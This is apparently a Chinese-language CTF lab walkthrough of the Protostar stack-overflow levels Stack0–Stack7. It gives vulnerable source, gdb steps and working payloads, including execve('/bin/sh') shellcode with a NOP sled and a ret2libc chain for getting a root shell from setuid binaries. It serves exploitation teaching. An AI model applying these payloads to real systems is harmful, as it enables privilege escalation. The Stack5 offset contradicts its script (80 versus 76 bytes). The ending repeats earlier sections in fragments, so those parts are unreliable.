Protostar二进制靶场栈溢出题目解析与教学文档<\/h1>

1. 简介<\/h2>
Protostar是Exploit Exercises系列中的一个入门级二进制漏洞利用靶场，特别适合学习栈溢出漏洞利用技术。本教学文档将详细解析Protostar靶场中的栈溢出题目(Stack0-Stack7)，涵盖从基础概念到实际利用的全过程。<\/p>

2. 环境准备<\/h2>

2.1 实验环境部署<\/h3>

下载Protostar的VM镜像文件<\/li>
使用VMware或VirtualBox加载镜像<\/li>

启动虚拟机后通过SSH连接：

ssh user@<虚拟机IP>
<\/code><\/pre>
<\/li>
输入密码后执行\/bin\/bash<\/code>获取更好的shell体验<\/li>
<\/ol>
2.2 题目位置<\/h3>
所有题目位于：<\/p>
\/opt\/protostar\/bin\/
<\/code><\/pre>
2.3 基本工具<\/h3>

gdb：GNU调试器，用于动态分析程序<\/li>
objdump：查看程序汇编代码<\/li>
python：编写漏洞利用脚本<\/li>
echo：简单测试输入<\/li>
<\/ul>
3. 基础知识<\/h2>
3.1 栈(stack)基础<\/h3>
栈是一种后进先出(LIFO)的数据结构，在程序执行中用于：<\/p>

存储函数调用的返回地址<\/li>
传递函数参数<\/li>
存储局部变量<\/li>
保存寄存器状态<\/li>
<\/ul>
栈的增长方向是从高地址向低地址。<\/p>
3.2 寄存器<\/h3>
x86架构中的重要寄存器：<\/p>

EIP：指令指针，存储下一条要执行的指令地址<\/li>
ESP：栈指针，指向栈顶<\/li>
EBP：基址指针，指向当前栈帧的基址<\/li>
EAX、EBX、ECX、EDX：通用寄存器<\/li>
<\/ul>
3.3 缓冲区溢出原理<\/h3>
当向固定大小的缓冲区写入超过其容量的数据时，多余的数据会覆盖相邻内存区域，可能改变程序执行流程。<\/p>
3.4 setuid程序<\/h3>
setuid程序运行时具有文件所有者(通常是root)的权限，即使由普通用户执行。这使得利用这类程序的漏洞可以提升权限。<\/p>
4. 题目解析<\/h2>
4.1 Stack Zero<\/h3>
目标<\/strong>：通过缓冲区溢出修改modified<\/code>变量的值<\/p>
源代码分析<\/strong>：<\/p>
int<\/span> main<\/span>(int<\/span> argc, char<\/span> **<\/span>argv) {
<\/span><\/span>    volatile<\/span> int<\/span> modified;
<\/span><\/span>    char<\/span> buffer[64<\/span>];
<\/span><\/span>
<\/span><\/span>    modified =<\/span> 0<\/span>;
<\/span><\/span>    gets(buffer);
<\/span><\/span>
<\/span><\/span>    if<\/span>(modified !=<\/span> 0<\/span>) {
<\/span><\/span>        printf("you have changed the 'modified' variable<\/span>\n<\/span>"<\/span>);
<\/span><\/span>    } else<\/span> {
<\/span><\/span>        printf("Try again?<\/span>\n<\/span>"<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞点<\/strong>：<\/p>

使用不安全的gets()<\/code>函数，不检查输入长度<\/li>
buffer<\/code>数组只有64字节，但输入可以更长<\/li>
<\/ul>
利用方法<\/strong>：<\/p>

计算需要多少输入才能覆盖modified<\/code>变量<\/li>
通过gdb分析内存布局：
gdb .\/stack0
disas main
<\/code><\/pre>
<\/li>
发现需要68字节填充(64字节buffer + 4字节modified)<\/li>
构造payload：
python -c "print 'A'*68"<\/span> | .\/stack0
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
4.2 Stack One<\/h3>
目标<\/strong>：将modified<\/code>变量设置为特定值0x61626364<\/code>("abcd")<\/p>
源代码分析<\/strong>：<\/p>
int<\/span> main<\/span>(int<\/span> argc, char<\/span> **<\/span>argv) {
<\/span><\/span>    volatile<\/span> int<\/span> modified;
<\/span><\/span>    char<\/span> buffer[64<\/span>];
<\/span><\/span>
<\/span><\/span>    modified =<\/span> 0<\/span>;
<\/span><\/span>    strcpy(buffer, argv[1<\/span>]);
<\/span><\/span>
<\/span><\/span>    if<\/span>(modified ==<\/span> 0x61626364<\/span>) {
<\/span><\/span>        printf("you have correctly got the variable to the right value<\/span>\n<\/span>"<\/span>);
<\/span><\/span>    } else<\/span> {
<\/span><\/span>        printf("Try again, you got 0x%08x<\/span>\n<\/span>"<\/span>, modified);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>关键点<\/strong>：<\/p>

使用命令行参数作为输入<\/li>
需要精确控制modified<\/code>的值<\/li>
x86是小端序，输入应为"dcba"<\/li>
<\/ul>
利用方法<\/strong>：<\/p>

计算偏移量：64字节buffer + 4字节modified<\/li>
构造payload：
.\/stack1 $(<\/span>python -c "print 'A'*64 + '\x64\x63\x62\x61'"<\/span>)<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
4.3 Stack Two<\/h3>
目标<\/strong>：通过环境变量设置modified<\/code>变量为0x0d0a0d0a<\/code><\/p>
源代码分析<\/strong>：<\/p>
int<\/span> main<\/span>(int<\/span> argc, char<\/span> **<\/span>argv) {
<\/span><\/span>    volatile<\/span> int<\/span> modified;
<\/span><\/span>    char<\/span> buffer[64<\/span>];
<\/span><\/span>    char<\/span> *<\/span>variable;
<\/span><\/span>
<\/span><\/span>    variable =<\/span> getenv("GREENIE"<\/span>);
<\/span><\/span>
<\/span><\/span>    if<\/span>(variable ==<\/span> NULL) {
<\/span><\/span>        errx(1<\/span>, "please set the GREENIE environment variable<\/span>\n<\/span>"<\/span>);
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    modified =<\/span> 0<\/span>;
<\/span><\/span>    strcpy(buffer, variable);
<\/span><\/span>
<\/span><\/span>    if<\/span>(modified ==<\/span> 0x0d0a0d0a<\/span>) {
<\/span><\/span>        printf("you have correctly modified the variable<\/span>\n<\/span>"<\/span>);
<\/span><\/span>    } else<\/span> {
<\/span><\/span>        printf("Try again, you got 0x%08x<\/span>\n<\/span>"<\/span>, modified);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>利用方法<\/strong>：<\/p>

设置环境变量：
export GREENIE=<\/span>$(<\/span>python -c "print 'A'*64 + '\x0a\x0d\x0a\x0d'"<\/span>)<\/span>
<\/span><\/span><\/code><\/pre><\/li>
运行程序：
.\/stack2
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
4.4 Stack Three<\/h3>
目标<\/strong>：通过覆盖函数指针执行win()<\/code>函数<\/p>
源代码分析<\/strong>：<\/p>
void<\/span> win<\/span>() {
<\/span><\/span>    printf("code flow successfully changed<\/span>\n<\/span>"<\/span>);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>(int<\/span> argc, char<\/span> **<\/span>argv) {
<\/span><\/span>    volatile<\/span> int<\/span> (*<\/span>fp)();
<\/span><\/span>    char<\/span> buffer[64<\/span>];
<\/span><\/span>
<\/span><\/span>    fp =<\/span> 0<\/span>;
<\/span><\/span>    gets(buffer);
<\/span><\/span>
<\/span><\/span>    if<\/span>(fp) {
<\/span><\/span>        printf("calling function pointer, jumping to 0x%08x<\/span>\n<\/span>"<\/span>, fp);
<\/span><\/span>        fp();
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>关键点<\/strong>：<\/p>

需要找到win()<\/code>函数的地址<\/li>
覆盖函数指针fp<\/code><\/li>
<\/ul>
利用步骤<\/strong>：<\/p>

获取win()<\/code>函数地址：
objdump -d stack3 | grep win
<\/span><\/span><\/code><\/pre>或使用gdb：
gdb .\/stack3
print win
<\/code><\/pre>
<\/li>
构造payload(64字节buffer + 4字节fp)：
python -c "print 'A'*64 + '\x24\x84\x04\x08'"<\/span> | .\/stack3
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
4.5 Stack Four<\/h3>
目标<\/strong>：通过覆盖返回地址执行win()<\/code>函数<\/p>
源代码分析<\/strong>：<\/p>
void<\/span> win<\/span>() {
<\/span><\/span>    printf("code flow successfully changed<\/span>\n<\/span>"<\/span>);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>(int<\/span> argc, char<\/span> **<\/span>argv) {
<\/span><\/span>    char<\/span> buffer[64<\/span>];
<\/span><\/span>    gets(buffer);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>关键点<\/strong>：<\/p>

没有明显的函数指针可以覆盖<\/li>
需要覆盖main函数的返回地址<\/li>
需要计算精确的偏移量<\/li>
<\/ul>
利用步骤<\/strong>：<\/p>

确定偏移量：

使用gdb分析，发现需要76字节覆盖返回地址<\/li>
<\/ul>
<\/li>
获取win()<\/code>函数地址：
objdump -d stack4 | grep win
<\/span><\/span><\/code><\/pre><\/li>
构造payload：
python -c "print 'A'*76 + '\xf4\x83\x04\x08'"<\/span> | .\/stack4
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
4.6 Stack Five<\/h3>
目标<\/strong>：执行任意shellcode获取root shell<\/p>
源代码分析<\/strong>：<\/p>
int<\/span> main<\/span>(int<\/span> argc, char<\/span> **<\/span>argv) {
<\/span><\/span>    char<\/span> buffer[64<\/span>];
<\/span><\/span>    gets(buffer);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>利用技术<\/strong>：<\/p>

经典的栈溢出执行shellcode<\/li>
需要覆盖返回地址指向shellcode<\/li>
需要考虑地址随机化(ASLR)问题(Protostar默认关闭)<\/li>
<\/ul>
利用步骤<\/strong>：<\/p>

确定偏移量：80字节<\/li>
确定shellcode在栈中的地址<\/li>
构造payload：

NOP sled + shellcode + 填充 + 返回地址<\/li>
<\/ul>
<\/li>
<\/ol>
示例payload<\/strong>：<\/p>
import<\/span> struct
<\/span><\/span>
<\/span><\/span>padding =<\/span> "A"<\/span>*<\/span>76<\/span>
<\/span><\/span>eip =<\/span> struct.<\/span>pack("I"<\/span>, 0xbffff7c0<\/span>)  # 指向NOP sled的地址<\/span>
<\/span><\/span>nopsled =<\/span> "<\/span>\x90<\/span>"<\/span>*<\/span>100<\/span>
<\/span><\/span>shellcode =<\/span> (
<\/span><\/span>    "<\/span>\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80<\/span>"<\/span>
<\/span><\/span>)
<\/span><\/span>
<\/span><\/span>print padding +<\/span> eip +<\/span> nopsled +<\/span> shellcode
<\/span><\/span><\/code><\/pre>执行方法<\/strong>：<\/p>
(<\/span>python stack5-exp.py; cat)<\/span> | .\/stack5
<\/span><\/span><\/code><\/pre>4.7 Stack Six & Seven<\/h3>
目标<\/strong>：绕过限制执行ret2libc攻击<\/p>
源代码分析(Stack Six)<\/strong>：<\/p>
void<\/span> what_now<\/span>() {
<\/span><\/span>    printf("Congratulations, you've completed this level<\/span>\n<\/span>"<\/span>);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>void<\/span> getpath<\/span>() {
<\/span><\/span>    char<\/span> buffer[64<\/span>];
<\/span><\/span>    unsigned<\/span> int<\/span> ret;
<\/span><\/span>    
<\/span><\/span>    printf("input path please: "<\/span>); fflush(stdout);
<\/span><\/span>    gets(buffer);
<\/span><\/span>    
<\/span><\/span>    ret =<\/span> __builtin_return_address(0<\/span>);
<\/span><\/span>    
<\/span><\/span>    if<\/span>((ret &<\/span> 0xbf000000<\/span>) ==<\/span> 0xbf000000<\/span>) {
<\/span><\/span>        printf("bzzzt (%p)<\/span>\n<\/span>"<\/span>, ret);
<\/span><\/span>        _exit(1<\/span>);
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    printf("got path %s<\/span>\n<\/span>"<\/span>, buffer);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>(int<\/span> argc, char<\/span> **<\/span>argv) {
<\/span><\/span>    getpath();
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>限制<\/strong>：<\/p>

检测返回地址是否在栈空间(0xbf000000)<\/li>
阻止直接跳转到栈上的shellcode<\/li>
<\/ul>
ret2libc技术<\/strong>：<\/p>

跳转到libc中的system()<\/code>函数<\/li>
传递"\/bin\/sh"字符串作为参数<\/li>
<\/ol>
利用步骤<\/strong>：<\/p>

获取system()<\/code>和"\/bin\/sh"地址：
gdb .\/stack6
<\/span><\/span>(<\/span>gdb)<\/span> p system
<\/span><\/span>(<\/span>gdb)<\/span> find &system,+9999999,"\/bin\/sh"<\/span>
<\/span><\/span><\/code><\/pre><\/li>
构造payload：

覆盖返回地址为system()<\/code><\/li>
后面跟着退出地址(可以是任意值)<\/li>
然后是"\/bin\/sh"地址<\/li>
<\/ul>
<\/li>
<\/ol>
示例payload<\/strong>：<\/p>
import<\/span> struct
<\/span><\/span>
<\/span><\/span>padding =<\/span> "A"<\/span>*<\/span>80<\/span>
<\/span><\/span>system =<\/span> struct.<\/span>pack("I"<\/span>, 0xb7ecffb0<\/span>)
<\/span><\/span>exit =<\/span> struct.<\/span>pack("I"<\/span>, 0xb7ec60c0<\/span>)
<\/span><\/span>binsh =<\/span> struct.<\/span>pack("I"<\/span>, 0xb7fb63bf<\/span>)
<\/span><\/span>
<\/span><\/span>print padding +<\/span> system +<\/span> exit +<\/span> binsh
<\/span><\/span><\/code><\/pre>Stack Seven<\/strong>与Stack Six类似，只是增加了更多限制，可以使用相同技术，但需要添加ROP gadget(如ret指令)来绕过限制。<\/p>
5. 防御技术简介<\/h2>
虽然Protostar靶场关闭了现代防护机制，但了解这些防御技术很重要：<\/p>

栈保护(Stack Canary)<\/strong>：在栈中插入随机值，函数返回前验证<\/li>
地址随机化(ASLR)<\/strong>：随机化内存布局，使地址难以预测<\/li>
NX\/DEP<\/strong>：数据区域不可执行，阻止shellcode执行<\/li>
RELRO<\/strong>：保护GOT表不被覆盖<\/li>
<\/ol>
6. 总结<\/h2>
Protostar靶场提供了一个绝佳的栈溢出学习环境，通过这8个题目，我们学习了：<\/p>

基本的缓冲区溢出原理<\/li>
覆盖局部变量<\/li>
覆盖函数指针<\/li>
覆盖返回地址<\/li>
执行shellcode<\/li>
ret2libc技术<\/li>
绕过各种保护机制<\/li>
<\/ol>
掌握这些基础知识是二进制漏洞利用的第一步，为进一步学习更复杂的漏洞利用技术打下坚实基础。<\/p>

Protostar二进制靶场栈溢出题目解析与教学文档<\/h1>

1. 简介<\/h2> Protostar是Exploit Exercises系列中的一个入门级二进制漏洞利用靶场，特别适合学习栈溢出漏洞利用技术。本教学文档将详细解析Protostar靶场中的栈溢出题目(Stack0-Stack7)，涵盖从基础概念到实际利用的全过程。<\/p>

2. 环境准备<\/h2>

3. 基础知识<\/h2>

3.3 缓冲区溢出原理<\/h3> 当向固定大小的缓冲区写入超过其容量的数据时，多余的数据会覆盖相邻内存区域，可能改变程序执行流程。<\/p>

3.4 setuid程序<\/h3> setuid程序运行时具有文件所有者(通常是root)的权限，即使由普通用户执行。这使得利用这类程序的漏洞可以提升权限。<\/p>

4. 题目解析<\/h2>

1. 简介<\/h2>
Protostar是Exploit Exercises系列中的一个入门级二进制漏洞利用靶场，特别适合学习栈溢出漏洞利用技术。本教学文档将详细解析Protostar靶场中的栈溢出题目(Stack0-Stack7)，涵盖从基础概念到实际利用的全过程。<\/p>

3.3 缓冲区溢出原理<\/h3>
当向固定大小的缓冲区写入超过其容量的数据时，多余的数据会覆盖相邻内存区域，可能改变程序执行流程。<\/p>

3.4 setuid程序<\/h3>
setuid程序运行时具有文件所有者(通常是root)的权限，即使由普通用户执行。这使得利用这类程序的漏洞可以提升权限。<\/p>